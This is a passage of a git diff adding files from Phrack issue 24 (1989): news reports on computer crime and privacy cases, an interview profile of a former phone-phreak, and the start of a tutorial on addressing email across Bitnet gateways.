+vastly expanded array of criminal records.  It would enable, for example,
+storage and electronic transmission of fingerprints, photos, tattoos and other
+physical attributes that might prevent a mistaken arrest.  Though
+controversial, FBI officials have recommended that it include a data bank
+containing names of suspects who have not been charged with a crime.
+
+The proposed system, however, already has enraged computer scientists and
+privacy experts who warn in a report that the system would pose a "potentially
+serious risk to privacy and civil liberties."  The report, prepared for the
+House subcommittee on civil and constitutional rights, also contends that the
+proposed $40 million overhaul would not correct accuracy problems or assure
+that records are secure.
+
+Mostly because of such criticism, the FBI's revamped proposal for a new system,
+known as the NCIC 2000 plan, is a skeleton of the capabilities first suggested
+by law enforcement officials.  Many of their ideas have been pared back, either
+for reasons of practicality or privacy.
+
+"Technical possibility should not be the same thing as permissible policy,"
+said Marc Rotenberg, an editor of the report and Washington liaison for
+Computer Professionals for Social Responsibility, a California organization.
+The need to make that tradeoff - to weigh the benefits of technological
+advances against the less obvious drawbacks - is becoming more apparent as
+nationwide computer links become the blood vessels of a high-tech society.
+
+Keeping technology under control requires users to double-check the accuracy of
+the stored data and sometimes resort told-fashioned paper records or
+face-to-face contact for confirmation.  Errors have plagued the NCIC for many
+years, but an extensive effort to improve record-keeping has significantly
+reduced the problem, the FBI said.
+
+Tapped by federal, state and local agencies, the existing FBI system juggles
+about 10 inquiries a second from people seeking records on wanted persons,
+stolen vehicles and property, and criminal histories, among other things. Using
+the current system, for example, a police officer making a traffic stop can
+fine out within seconds whether the individual is wanted anywhere else in the
+United States, or an investigator culling through a list of suspects can peruse
+past records.
+
+At one point, the FBI computer of the future was envisioned as having links to
+a raft of other data bases, including credit records and those kept by the
+Immigration and Naturalization Service, the Internal Revenue Service, the
+Social Security Administration and the Securities and Exchange Commission.
+One by one, review panels have scaled back that plan.
+
+"There's a lot of sensitive information in those data bases," said Lt. Stanley
+Michaleski, head of records for the Montgomery County [Maryland] police.  "I'm
+not going to tell you that cops aren't going to misuse the information."
+
+The most controversial portion of the planned system would be a major expansion
+to include information on criminal suspects - whose guilt has not yet been
+established.
+
+The proposed system would include names of persons under investigation in
+murder, kidnapping or narcotics cases.  It would include a so-called "silent
+hit" feature:  An officer in Texas, for instance, would not know that the
+individual he stopped for speeding was a suspect for murder in Virginia.  But
+when the Virginia investigators flipped on their computer the next morning, it
+would notify them of the Texas stop.  To Michaleski, the proposal sounded like
+"a great idea.  Information is the name of the game."  But the "tracking"
+ability has angered critics.
+
+"That [data base] could be enlarged into all sorts of threats - suspected
+communists, suspected associates of homosexuals.  There is no end once you
+start," said Rep. Don Edwards (D-Calif.), whose subcommittee called for the
+report on the FBI's system.
+
+The FBI's chief of technical services, William Bayse, defends the proposed
+files, saying they would help catch criminals while containing only carefully
+screened names.  "The rationale is these guys are subjects of investigations,
+and they met a certain guideline," he said.
+
+So controversial is the suspect file that FBI Director William Sessions
+reportedly may not include it when he publicly presents his plan for a new
+system.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+A case similar to Sklar's was that of Terry Dean Rogan, who was arrested five
+times because of outstanding warrants caused by someone else masquerading as
+him.  He finally settled for $50,000 in damages.
+_______________________________________________________________________________
+
+Legal Clamp-Down On Australian Hackers                        February 14, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Julie Power (The Financial Review)
+
+Federal Cabinet is expected to endorse today draft legislation containing tough
+penalties for hacking into Commonwealth computer systems.  It is understood
+that the Attorney-General, Mr. Lionel Bowen, will be proposing a range of tough
+new laws closely aligned with the recommendations of the Attorney-General's
+Department released in December.  Mr. Bowen requested the report by the Review
+of Commonwealth Criminal Law, chaired by Sir Harry Gibbs, as a matter of
+urgency because of the growing need to protect Commonwealth information and
+update the existing legislation.
+
+Another consideration could be protection against unauthorized access of the
+tax file number, which will be stored on a number of Government databases.
+
+If the report's recommendations are endorsed, hacking into Commonwealth
+computers will attract a $48,000 fine and 10 years imprisonment.  In addition,
+it would be an offense to destroy, erase, alter, interfere, obstruct and
+unlawfully add to or insert data in a Commonwealth computer system.
+
+The legislation does not extend to private computer systems.  However, the
+Attorney-General's Department recommended that it would be an offense to access
+information held in a private computer via a Telecom communication facility or
+another Commonwealth communication facility without due authority.
+_______________________________________________________________________________
+
+Multi-Gigabuck Information Theft                               February 8, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Bob Mitchell (Toronto Star)(Edited for this presentation)
+
+A man has been arrested and charged with unauthorized use of computer
+information, following a 2-month police investigation.  The suspect was an
+associate of a "very big" Toronto company:  "A company that people would know,
+with offices across Canada." Police are keeping the company's name secret at
+its request.  They say the perpetrator acted alone.
+
+A password belonging to the company was used to steal information which the
+company values at $4 billion (Canadian).  This information includes computer
+files belonging to an American company, believed to contain records from
+numerous companies, and used by large Canadian companies and the United States
+government.
+
+"We don't know what this individual was planning to do with the information,
+but the potential is unbelievable.  I'm not saying the individual intended to
+do this, but the program contained the kind of information that could be sold
+to other companies," said Lewers.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Further investigation of the above details led to the following;
+
+Multi-Gigabuck Value Of Information Theft Denied              February 17, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Different facts about the information theft were reported two days after the
+original story.
+
+The information in this article is from the Toronto Globe & Mail.  The article
+is headlined "Computer Information Theft Detected By Security System, Company
+Says."  And it begins as follows:
+
+    "The theft of information from a company's computer program was
+     detected by the firm's own computer security system.
+
+     Mike Tillson, president of HCR Corporation, which specializes in
+     developing computer software, said yesterday an unusual pattern
+     of computer access was noticed on the company's system last week."
+
+The article continues by saying that police reports valuing the "program" at $4
+billion (Canadian) were called grossly exaggerated by Tilson:  "It's more in
+the tens of thousands of dollars range."  He also said that the illegal access
+had been only a week before; there was no 2-month investigation.  And asked
+about resale of the information, he said, "It's not clear how one would profit
+from it.  There are any number of purposes one could imagine to idle curiosity.
+There is a possibility of no criminal intent."
+
+The information not being HCR customer data, and Tilson declining to identify
+it, the article goes on to mention UNIX, to mumble about AT&T intellectual
+property, and to note that AT&T is not in the investigation "at this stage."
+_______________________________________________________________________________
+
+More Syracuse Busts                                            February 6, 1989
+~~~~~~~~~~~~~~~~~~~
+St. Elmos Fire was arrested after a supposed friend turned him in to the police
+and signed an affidavit.  His crimes include hacking into his school's HP3000
+and the FBI and Telenet are trying to get him for hacking into another HP3000
+system in Illinois.
+
+However, it was the "friend" that was actually the person responsible for the
+damage done to the computer in Illinois.  The problem is that Telenet traced
+that calls to Syracuse, New York and because of the related crimes, the
+authorities are inclined to believe that both were done by the same
+individual.
+
+St. Elmos Fire has already had his arraignment and his lawyer says that there
+is very little evidence to connect SEF to the HP3000 in Syracuse, NY.  However,,
+nothing is really known at this time concerning the status of the system in
+Illinois.
+
+                      Information Provided by Grey Wizard
+_______________________________________________________________________________
+
+Television Editor Charged In Raid On Rival's Files             February 8, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From San Jose Mercury News
+
+TAMPA, Fla. (AP) - A television news editor hired away from his station by a
+competitor has been charged with unlawfully entering the computer system of his
+former employer to get confidential information about news stories.
+
+Using knowledge of the system to bypass a security shield he helped create,
+Michael L. Shapiro examined and destroyed files relating to news stories at
+Tampa's WTVT, according to the charges filed Tuesday.
+
+Telephone records seized during Shapiro's arrest in Clearwater shoed he made
+several calls last month to the computer line at WTVT, where he worked as
+assignment editor until joining competitor WTSP as an assistant news editor in
+October.
+
+Shapiro, 33, was charged with 14 counts of computer-related crimes grouped into
+three second-degree felony categories:  Offenses against intellectual property,
+offenses against computer equipment and offenses against computer users.  He
+was released from jail on his own recognizance.
+
+If convicted, he could be sentenced to up to 15 years in prison and fined
+$10,000 for each second-degree felony count.
+
+Bob Franklin, WTVT's interim news director, said the station's management
+discovered several computer files were missing last month, and Shapiro was
+called to provide help.  Franklin said the former employee claimed not to know
+the cause of the problem.
+
+At a news conference, Franklin said: "Subsequent investigation has revealed
+that, at least since early January, WTVT's newsroom computer system has been
+the subject of repeated actual and attempted 'break-ins.'  The computers
+contain highly confidential information concerning the station's current and
+future news stories."
+
+The news director said Shapiro was one of two people who had responsibility for
+daily operation and maintenance of the computer system after it was installed
+about eight months ago.  The other still works at WTVT.
+
+Terry Cole, news director at WTSP, said Shapiro has been placed on leave of
+absence from his job.  Shapiro did not respond to messages asking for comment.
+
+Franklin said Shapiro, employed by WTVT from February 1986 to September, 1988,
+left to advance his career. "He was very good at what he did," Franklin said.
+"He left on good terms."
+_______________________________________________________________________________
diff --git a/phrack24/13.txt b/phrack24/13.txt
new file mode 100644
index 0000000..c0530f9
--- /dev/null
+++ b/phrack24/13.txt
@@ -0,0 +1,328 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 24, File 13 of 13
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXIV/Part 3                PWN
+            PWN                                                 PWN
+            PWN                February 25, 1989                PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+The Judas Contract Fulfilled!                                  January 24, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+    "...the other thing that made me mad was that I consider myself, at
+     least I used to consider myself, a person who was pretty careful
+     about who I trust, basically nobody had my home number, and few
+     people even knew where I really lived..."
+
+                                                 -The Disk Jockey
+
+The following story, as told by The Disk Jockey, is a prime example of the
+dangers that exist in the phreak/hack community when sharing trust with those
+who have made The Judas Contract.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Let me briefly explain how I got caught...
+
+A hacker named Compaq was busted after someone turned him in for using Sprint
+codes.  While executing the search warrant, the state police noticed that he
+had an excessive amount of computer equipment which had origins that Compaq
+could not explain.
+
+After checking around (I imagine checking serial numbers that Compaq had not
+removed), the police found that the equipment was obtained illegally.  Compaq
+then proceeded to tell the police that I, Doug Nelson (as he thought my name
+was) had brought them to him (true).
+
+Meanwhile, Compaq was talking to me and he told me that he was keeping his
+mouth shut the entire time.  Keep in mind that I had been talking to this guy
+for quite a long time previously and thought that I knew him quite well.  I
+felt that I was quite a preceptive person.
+
+As time went by, little did I know, Compaq was having meetings again and again
+with the state police as well as the Federal Bureau of Investigation (FBI)
+concerning finding out who I was.  He gave them a complete description of me,
+and where I (correctly) went to school, but again, he was SURE my name was
+Douglas Nelson, and since my phone had previously been in that name, he felt
+assured that he was correct.  The Police checked with Illinois and couldn't
+find license plates or a driver's license in that name.  He had remembered
+seeing Illinois license plates on my car.
+
+They were stuck until Compaq had a wonderful:  He and I had went out to dinner
+and over the course of conversation, I mentioned something about living in
+Bloomfield Hills, Michigan.
+
+After telling the state police this information, they wrote to Bloomfield Hills
+and gave a description and asked for any pictures in their files that fit that
+description.
+
+The problem was that several years ago, some friends and I were arrested for
+joyriding in a friend's snowmobile while he was on vacation.  The neighbors
+didn't know us and called the police.  Charges were dropped, but our prints and
+pictures were on file.
+
+Bloomfield Hills sent back 12 pictures, which, according to the police report,
+"Kent L. Gormat (Compaq) without hesitation identified picture 3 as the
+individual he knows as Douglas Nelson.  This individuals name was in fact
+Douglas..."
+
+A warrant was issued for me and served shortly afterwards by state, local and
+federal authorities at 1:47 AM on June 27, 1988.
+
+Lucky me to have such a great pal.  In the 6 months that I was in prison, my
+parents lived 400 miles away and couldn't visit me, my girlfriend could come
+visit me once a month at best, since she was so far away, and Compaq, who lived
+a whole 10 miles away, never came to see me once.  This made me rather angry as
+I figured this "friend" had a lot of explaining to do.
+
+As you can see I am out of prison now, but I will be on probation until
+December 15, 1989.
+                                                 -The Disk Jockey
+_______________________________________________________________________________
+
+Bogus Frequent Flyer Scheme                                   February 13, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Associated Press
+
+An airline ticket agent piled up 1.7 million bonus air miles via computer
+without leaving the ground, then sold the credits for more than $20,000,
+according to a published report.
+
+Ralf Kwaschni, age 28, was arrested Sunday when he arrived for work at Kennedy
+International Airport and was charged with computer tampering and grand
+larceny, authorities said.
+
+Kwaschni, a ticket agent for Lufthansa Airlines, used to work for American
+Airlines.  Police said he used his computer access code to create 18 fake
+American Airline Advantage Accounts - racking up 1.7 million bonus air miles,
+according to the newspaper.
+
+All 18 accounts, five in Kwaschni's name and 13 under fake ones, listed the
+same post office box, according to the newspaper.
+
+Instead of exchanging the bonus miles for all the free travel, Kwaschni sold
+some of them for $22,500 to brokers, who used the credits to get a couple of
+first class, round trip tickets from New York to Australia, two more between
+London and Bermuda, and one between New York and Paris.  It is legal to sell
+personal bonus miles to brokers Port Authority Detective Charles Schmidt said.
+
+Kwaschni would create accounts under common last names.  When a person with one
+of the names was aboard an American flight and did not have an Advantage
+account, the passengers name would be eliminated from the flight list and
+replaced with one from the fake accounts.
+
+"As the plane was pulling away from the gate, this guy was literally wiping out
+passengers," Schmidt said.
+_______________________________________________________________________________
+
+Massive Counterfeit ATM Card Scheme Foiled                    February 11, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Douglas Frantz (Los Angeles Times)
+
+The U.S. Secret Service foiled a scheme to use more than 7,700 counterfeit ATM
+cards to obtain cash from Bank of America automated tellers.  After a
+month-long investigation with an informant, five people were arrested and
+charged with violating federal fraud statutes.
+
+"Seized in the raid were 1,884 completed counterfeit cards, 4,900 partially
+completed cards, and a machine to encode the cards with Bank Of America account
+information, including highly secret personal identification numbers for
+customers."
+
+The alleged mastermind, Mark Koenig, is a computer programmer for Applied
+Communications, Inc. of Omaha, a subsidiary of U.S. West.  He was temporarily
+working under contract for a subsidiary of GTE Corporation, which handles the
+company's 286 ATMs at stores in California.  Koenig had access to account
+information for cards used at the GTE ATMs.  According to a taped conversation,
+Koenig said he had transferred the BofA account information to his home
+computer.  He took only Bank Of America information "to make it look like an
+inside job" at the bank.  The encoding machine was from his office.
+
+Koenig and confederates planned to spread out across the country over six days
+around the President's Day weekend, and withdraw cash.  They were to wear
+disguises because some ATMs have hidden cameras.  Three "test" cards had been
+used successfully, but only a small amount was taken in the tests, according to
+the Secret Service.
+
+The prosecuting US attorney estimated that losses to the bank would have been
+between $7 and $14 million.  Bank Of America has sent letters to 7,000
+customers explaining that they will receive new cards.
+_______________________________________________________________________________
+
+STARLINK - An Alternative To PC Pursuit                        January 24, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+STARLINK is an alternative to PC Pursuit.  You can call 91 cities in 28 states
+during off-peak hours (7pm-6am and all weekend) for $1.50 per hour.  All
+connections through the Tymnet network are 2400 bps (1200 bps works too) with
+no surcharge and there are no maximum hours or other limitations.
+
+There is a one time charge of $50 to signup and a $10 per month account
+maintenance fee.  High volume users may elect to pay a $25 per month
+maintenance fee and $1.00 per hour charge.
+
+The service is operated by Galaxy Telecomm in Virginia Beach, VA and users may
+sign up for the service by modem at 804-495-INFO.  You will get 30 minutes free
+access time after signing up.
+
+This is a service of Galaxy and not TYMNET.  Galaxy buys large blocks of hours
+from TYMNET.  To find out what your local access number is you can call TYMNET
+at (800) 336-0149 24 hours per day.  Don't ask them questions about rates,
+etc., as they don't know.  Call Galaxy instead.
+
+Galaxy says they will soon have their own 800 number for signups and
+information.
+
+The following is a listing of the major cities covered.  There are others that
+are a local call from the ones listed.
+
+
+Eastern Time Zone
+
+Connecticut:  Bloomfield  Hartford  Stamford
+Florida: Fort Lauderdale  Jacksonville  Longwood  Miami  Orlando  Tampa
+Georgia: Atlanta  Doraville  Marietta  Norcross
+Indiana: Indianapolis
+Maryland: Baltimore
+Massachusetts: Boston  Cambridge
+New Jersey: Camden  Englewood Cliffs  Newark  Pennsauken  Princeton  South
+            Brunswick
+New York:  Albany  Buffalo  Melville  New York  Pittsford  Rochester
+           White Plains
+North Carolina: Charlotte
+Ohio:  Akron  Cincinnati  Cleveland  Columbus  Dayton
+Pennsylvania: Philadelphia  Pittsburgh
+Rhode Island: Providence
+Virginia: Alexandria  Arlington  Fairfax  Midlothian  Norfolk  Portsmouth
+
+
+Central Time Zone
+
+Alabama: Birmingham
+Illinois: Chicago  Glen Ellyn
+Kansas: Wichita
+Michigan: Detroit
+Minnesota: Minneapolis  St. Paul
+Missouri: Bridgeton  Independence  Kansas City  St. Louis
+Nebraska: Omaha
+Oklahoma: Oklahoma City  Tulsa
+Tennessee: Memphis  Nashville
+Texas: Arlington  Dallas  Fort Worth  Houston
+Wisconsin:  Brookfield  Milwaukee
+
+
+Mountain Time Zone
+
+Arizona: Mesa  Phoenix  Tucson
+Colorado:  Aurora  Boulder  Denver
+
+
+Pacific Time Zone
+
+California:  Alhambra  Anaheim  El Segundo  Long Beach  Newport Beach
+             Oakland  Pasadena  Pleasanton  Sacramento  San Francisco
+             San Jose  Sherman Oaks  Vernon  Walnut Creek
+Washington:  Bellevue  Seattle
+
+
+STARLINK is a service of Galaxy Telecomm Division, GTC, Inc., the publishers of
+BBS Telecomputing News, Galaxy Magazine and other electronic publications.
+_______________________________________________________________________________
+
+Suspended Sentences For Computer Break-In                     February 20, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Personal Computing Weekly
+
+      "Police Officers Sentenced For Misuse Of Police National Computer"
+
+Three police officers hired by private investigators to break into the Police
+National Computer received suspended prison sentences at Winchester Crown
+Court.  The private investigators also received suspended (prison) sentences,
+ranging from four to six months.
+
+The police officers were charged under the Official Secrets Act of conspiring
+to obtain confidential information from the Police National Computer at Hendon.
+
+One of the police officers admitted the charge, but the other two and the
+private investigators pleaded Not Guilty.
+
+The case arose out of a Television show called "Secret Society" in which
+private investigator Stephen Bartlett was recorded telling journalist Duncan
+Campbell that he had access to the Police National Computer, the Criminal
+Records Office at Scotland Yard and the DHSS (Department of Health & Social
+Security).
+
+Bartlett said he could provide information on virtually any person on a few
+hours.  He said he had the access through certain police officers at
+Basingstoke, Hampshire.  Although an investigation proved the Basingstoke
+connection to be false, the trail led to other police officers and private
+detectives elsewhere.
+
+Most of the information gleaned from the computers was used to determine who
+owned certain vehicles, who had a good credit record -- or even who had been in
+a certain place at a certain time for people investigating marital infidelity.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Of course, the actions for which the officers and others were sentenced, were
+not computer break-ins as such, but rather misuse of legitimate access.
+_______________________________________________________________________________
+
+Virus Hoax Caused As Much Panic As The Real Thing             February 20, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From Popular Computing Weekly
+
+                         "A Virus Is Up And Running"
+
+Michael Banbrook gave his college network managers a scare when he planted a
+message saying that a virus was active on the college system.
+
+Banbrook's message appeared whenever a user miskeyed a password; the usual
+message would be
+
+                       "You are not an authorized user."
+
+It was replaced by the brief but sinister:
+
+                         "A Virus is up and running."
+
+When the message was discovered by the college network manager, Banbrook was
+immediately forbidden access to any computers at the St. Francix Xavier College
+at Clapham in South London.
+
+Banbrook, 17, told "Popular Computing Weekly" that he believed the college
+has over-reacted and that he had, in fact thrown a spotlight on the college's
+lackluster network security.  The college has a 64 node RM Nimbus network
+running MS-DOS.
+
+"All any has to do is change a five-line DOS batch file" says Banbrook.
+"There is no security at all"
+
+Banbrook admits his motives were not entirely related to enhancing security:
+"I was just bored and started doodling and where some people would doodle with
+a notepad, I doodle on a keyboard.  I never thought anyone would believe the
+message."
+
+Banbrook was suspended from computer science A-level classes and forbidden to
+use the college computers for a week before it was discovered that no virus
+existed.  Following a meeting between college principal Bryan Scalune and
+Banbrook's parents, things are said to be "back to normal."
+_______________________________________________________________________________
+
+Phrack World News -- Quicknotes
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+For those interested in the 312/708 NPA Split, the correct date for this
+division is November 11, 1989.  However, permissive dialing will continue until
+at least February 9, 1990.
+-------------------------------------------------------------------------------
+Anyone who is wondering what Robert Morris, Jr. looks like should have a look
+at Page 66 in the January 1989 issue of Discover Magazine.
+_______________________________________________________________________________
+
diff --git a/phrack24/2.txt b/phrack24/2.txt
new file mode 100644
index 0000000..44a2559
--- /dev/null
+++ b/phrack24/2.txt
@@ -0,0 +1,120 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 24, File 2 of 13
+
+                           ==Phrack Pro-Phile XXIV==
+
+                       Created and Written by Taran King
+
+                           Done on February 3, 1989
+
+         Welcome to Phrack Pro-Phile XXII.  Phrack Pro-Phile was created to
+bring information to you, the community, about retired or highly important/
+controversial people.  This issue, I present one of the more rare sights in the
+world of phreaking and hacking...a female!  She was vaguely active and had a
+few contacts with people that were largely involved with the community...
+
+                                  Chanda Leir
+                                  ~~~~~~~~~~~
+       Handle:  Chanda Leir
+     Call Her:  Karen
+ Past Handles:  None
+Handle Origin:  An aunt of hers as a child wanted to use this name is she ever
+                became famous.
+Date Of Birth:  May 8, 1970
+  Current Age:  Almost 19
+       Height:  5' 6"
+       Weight:  125 lbs. (providing Freshman 15 hasn't yet hit)
+    Eye Color:  Green/Grey
+   Hair Color:  Blond
+    Computers:  Her father is a real estate broker, so she began on a TI 700
+                terminal (an MLS Terminal)... just a modem and a keyboard and a
+                scroll of PAPER)... then it was dad's business computer-- the
+                KAYPRO II... Now she uses the Macs and the Sun systems and the
+                IBM RT's located at CMU.
+
+-------------------------------------------------------------------------------
+
+Karen started using BBSes in the D.C. area in 1983 (at the ripe age of 13).  A
+guy by the name of Hack-Man (she supposes this was the "original" H-M) was
+running a board off of the dead side of the local 678 loop.  Her introduction
+to phone "stuff" began when she called the "board" one day and found instead 30
+people on the line instead of a carrier.
+
+She was dumbfounded, and being female, there were 30 guys on the conference
+ready and willing to provide her with information as to origins of loops,
+conferences, boxing, etc.  Scott (Hack-Man) later filled her in on the rest,
+gave her more numbers and such and that's where it all began.
+
+The memorable phreakers or hackers that Karen has met include Cheshire Cat,
+Tuc, Bioc Agent 003 and anyone else who was at the TAP meeting during
+Thanksgiving of 1984.
+
+She gained her experience by asking a LOT of questions to a lot of hard-up guys
+who were willing to give her all kinds of info since she was a girl.  She
+attributes her information mostly to just taking in and remembering all of the
+information that people gave her.
+
+The two boards that Karen listed as memorable were both in Falls Church, VA.
+which were Mobius Strip and Xevious II.
+
+Currently she's a freshman at Carnegie Mellon University in Pittsburgh (or as
+she likes to call it, COMPUTER U.).  Her major is probably "Policy &
+Management."
+
+Her major accomplishment is that she was probably the youngest girl ever to
+attend a TAP meeting (at the age of 14) and probably one of the only people to
+attend one with Mom, Dad, and Aunt Linda (how embarrassing).
+
+One of the reasons she quit the phreak/hack world was because of a visit from
+the Secret Service in February 1985... although they didn't really come for
+her... A "friend" wanted for credit card fraud called her while his line was
+hooked to a pin register.
+
+The same weekend he called Karen, was Inauguration Weekend and she and her
+brother called the 456 (White House) loop something like 21 times in the 4-day
+weekend period... In any case the SS wanted to catch Eric and when her number
+showed up in two places, they decided to investigate.  Freaked out her parents!
+
+The real reason she quit the phreak/hack world was because she transferred high
+schools in 1985 and became one of the "popular" kids and gained a social life,
+thus losing time and interest for the computer.
+
+-------------------------------------------------------------------------------
+
+Chanda Lier's Interests Include:  MUSIC... specifically harDCore... (that would
+                                  be punk rock from Washington, DC).  Most of
+                                  her friends are or were in DC bands...  The
+                                  Untouchables, Teen Idles, Minor Threat, Youth
+                                  Brigade (DC), Grey Matter, Government Issue,
+                                  etc.
+
+                                  HORROR... novels, movies, comics....  Clive
+                                  Barker, Arcane Comix (of which her friend
+                                  Steve is publisher of), Peter Straub, Dean
+                                  Koontz, Whitely Streiber etc... that whole
+                                  genre...
+                                  And Flannery O'Connor rules...
+
+Her most memorable experiences include the following:
+
+     Her parents used to "make" her start conferences for them whenever it was
+a relative's birthday.  They would get the whole family on the line and chat
+and stuff.  Everyone thought it was really cool....
+     Other fun times were when her dad would pull out his DoD (Department of
+Defense) phonebook and they would hack around for modem lines....
+     Tuc coming to her grandmother's house in April 1985 and then going to see
+"Desperately Seeking Susan"...
+
+Some People to Mention:
+     "I guess, just Taran King, for this interview, and Knight Lightning...both
+of whom contacted me here at CMU.... and TUC... and ...?"
+
+-------------------------------------------------------------------------------
+
+And of course...that regular closing to the Phrack Pro-Phile...  Are most of
+the phreaks and hackers that you've met computer geeks?  "YES... no doubt."
+
+Thanks for your time, Karen.
+
+                                                   Taran King
diff --git a/phrack24/3.txt b/phrack24/3.txt
new file mode 100644
index 0000000..5cca428
--- /dev/null
+++ b/phrack24/3.txt
@@ -0,0 +1,387 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 24, File 3 of 13
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>                      Limbo To Infinity                     <>
+       <>                      ~~~~~~~~~~~~~~~~~                     <>
+       <>        Chapter Three of The Future Transcendent Saga       <>
+       <>                                                            <>
+       <>      Traversing The Barriers For Gateway Communication     <>
+       <>                                                            <>
+       <>                Presented by Knight Lightning               <>
+       <>                      February 11, 1989                     <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+Beyond Bitnet lies the other wide area networks.  We will discuss more about
+those networks in chapter four.  Right now lets learn how to communicate with
+those other realms.
+_______________________________________________________________________________
+
+Mailing To Other Networks - Gateway Communications
+~~~~~~~~~~~~~~~~~~~~~~~~~
+Bitnet, as you already know, is not the only computer network in the world.
+What you might be surprised to find out, however, is that when you have access
+to Bitnet you also have access to many other networks as well.  Unfortunately,
+the methods for communicating with people in these other networks are not as
+simple as the ones described earlier.
+
+Bitnet's links to other networks give you access to people and services you
+could not contact otherwise (or at least without great expense).  This alone
+should make learning a bit about them worthwhile.
+
+In chapter one of this series, I showed you how some Bitnet nodenames can be
+broken down into state abbreviations.  To go a step further, try and think of
+Bitnet as a country and the links between the Bitnet nodes as highways.
+Another network (or country in this example) is connected to our highway system
+at one point, which is called a "gateway."  These borders do not let
+interactive messages or files through; only mail is allowed past the gateway.
+
+The people in these other networks have addresses just like yours, but you will
+need to specify something extra in order to get mail to them.  A userid@node
+address is not enough, because that does not tell the Bitnet mail software what
+network that node is in.  Therefore, we can extend the network address with a
+code that identifies the destination network.  In this example, the destination
+network is ARPAnet (a network I'm sure you have heard much about), the code for
+which is ARPA.
+
+                 TARAN@MSP-BBS.ARPA
+                 +---- +------ +---
+                 |     |       |
+                 |     |       +-------------------- the network
+                 |     |
+                 |     +---------------------------- the node
+                 |
+                 +---------------------------------- the userid
+
+
+That is about as simple as an address from another network gets.  Generally
+they are much more complex.  Because of the variety of networks there can be no
+example which will show you what a "typical" address might be.  However, you
+should not have to let it worry you too much.  If someone tells you that his
+network address is C483307@UMCVMB.MISSOURI.EDU, just use it like that with your
+mail software.  As long as you understand that the mail is going to another
+network and that the transit time may be longer than usual (although in many
+cases I have found that mail going to EDU addresses is delivered much faster
+than Bitnet mail) you should not have many problems.
+
+
+More On Gateways
+~~~~~~~~~~~~~~~~
+I introduced the gateways in the previous section, but didn't get into too much
+detail.  This is because the subject can get more than a little complex at
+times.  Actually, understanding gateways isn't difficult at all, but
+interpreting network addresses that use them can be.
+
+In the previous example, an address for someone in another network looked like
+this:
+                 TARAN@MSP-BBS.ARPA
+
+
+The ".ARPA" in the address tells your networking software that your letter
+should go to someone in another network.  What you might not realize is that
+your networking software "knows" that the address for the gateway to ARPA may
+be at, say INTERBIT.  It might extend the address to look something like this:
+
+                 TARAN%MSP-BBS.ARPA@INTERBIT
+                 +---- +------ +--- +-------
+                 |     |       |    |
+                 |     |       |    +--------------- the node of the gateway
+                 |     |       |
+                 |     |       +-------------------- the network
+                 |     |
+                 |     +---------------------------- the node
+                 |
+                 +---------------------------------- the userid
+
+
+The gateway is a server machine (userid@node) that transfers files between the
+two networks.  In this case, it is ARPA@INTERBIT.  Note that the "%" replaces
+the "@" from the previous example.  This is because Bitnet networking software
+cannot handle addresses with more than one AT sign (@).  When your mail gets to
+the gateway, the "@INTERBIT" would be stripped off, and the "%" would be turned
+back into a "@".
+
+Ok, so now you are asking, "If this is so automatic, why do you need to know
+this?"  In many cases your networking software is not smart enough to know that
+the gateway for SCONNET is at STLMOVM.  If this is the case, you have to type
+out the whole address with all of the interesting special characters.
+
+For example, sometimes, you may have to change the addresses around somewhat.
+Let's say I'm talking to Lex Luthor one day and he tells me his address is
+"lex@plover.COM".  I have found that an address like "lex@plover.COM" would
+actually be mailed to as "plover!lex@RUTGERS.EDU".  Now this is just a specific
+example of how it works from my particular system and other systems (not to
+mention networks) will work differently (this is a guide for people using
+Bitnet).  The COM (Commercial) addresses are not recognized by the mailer at
+UMCVMB and so I have to route them through Rutgers University.  In chapter
+four, I will discuss some of the other networks that are interconnected.
+
+In many cases, a gateway to a network may be in another network.  In this
+example, we are sending mail to RED at node KNIGHT in HDENNET.  The gateway to
+the network is in, say, ARPAnet.  Our networking software is smart enough to
+know where ARPA gateway is, so the address might look something like this:
+
+                   RED%KNIGHT.HDENNET@SRI-NIC.ARPA
+                   +-- +----- +------ +------ +---
+                   |   |      |       |       |
+                   |   |      |       |       +----- the network of the gateway
+                   |   |      |       |
+                   |   |      |       +------------- the node of the gateway
+                   |   |      |
+                   |   |      +--------------------- the network
+                   |   |
+                   |   +---------------------------- the node
+                   |
+                   +-------------------------------- the userid
+
+
+As you can see, these addresses can get pretty long and difficult to type.
+Perhaps the only consolation is that your address probably looks just as bad to
